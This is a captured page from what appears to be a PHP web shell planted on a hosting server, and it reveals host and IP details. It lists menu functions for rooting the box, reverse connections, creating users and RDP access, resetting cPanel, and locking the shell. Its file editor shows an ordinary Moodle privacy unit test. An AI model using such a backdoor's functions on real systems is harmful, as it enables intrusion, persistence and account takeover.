Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.27
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
repository /
flickr /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
generator
[ DIR ]
drwxr-xr-x
privacy_test.php
3.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : privacy_test.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Privacy tests for repository_flickr. * * @package repository_flickr * @category test * @copyright 2018 Zig Tan <zig@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die(); use \repository_flickr\privacy\provider; use \core_privacy\local\request\approved_contextlist; use \core_privacy\local\request\writer; use \core_privacy\tests\provider_testcase; /** * Unit tests for repository/flickr/privacy/provider * * @copyright 2018 Zig Tan <zig@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ class repository_flickr_privacy_testcase extends provider_testcase { /** * Overriding setUp() function to always reset after tests. */ public function setUp(): void { $this->resetAfterTest(true); } /** * Test for provider::export_user_preferences(). */ public function test_export_user_preferences() { global $DB; // Test setup. $user = $this->getDataGenerator()->create_user(); $this->setUser($user); $contextlist = provider::get_contexts_for_userid($user->id); $approvedcontextlist = new approved_contextlist($user, 'repository_flickr', $contextlist->get_contextids()); $user = $approvedcontextlist->get_user(); $contextuser = context_user::instance($user->id); // Test exporting of Flickr repository user preferences *without* OAuth token/secret preference configured. provider::export_user_preferences($user->id); $writer = writer::with_context($contextuser); // Verify there is no user preferences data exported. $this->assertFalse($writer->has_any_data()); // Test exporting of Flickr repository user preferences *with* OAuth token/secret preference configured. set_user_preferences([ 'repository_flickr_access_token' => 'dummy flickr oauth access token', 'repository_flickr_access_token_secret' => 'dummy flickr oauth access token secret', ], $user->id); provider::export_user_preferences($user->id); $writer = writer::with_context($contextuser); // Verify there is user preferences data exported. $this->assertTrue($writer->has_any_data()); $userpreferences = $writer->get_user_preferences('repository_flickr'); // Verify the OAuth token is not an empty string value and the OAuth secret is an empty string value. $accesstoken = $userpreferences->repository_flickr_access_token; $this->assertFalse(empty($accesstoken->value)); $accesstokensecret = $userpreferences->repository_flickr_access_token_secret; $this->assertTrue(empty($accesstokensecret->value)); } }
Close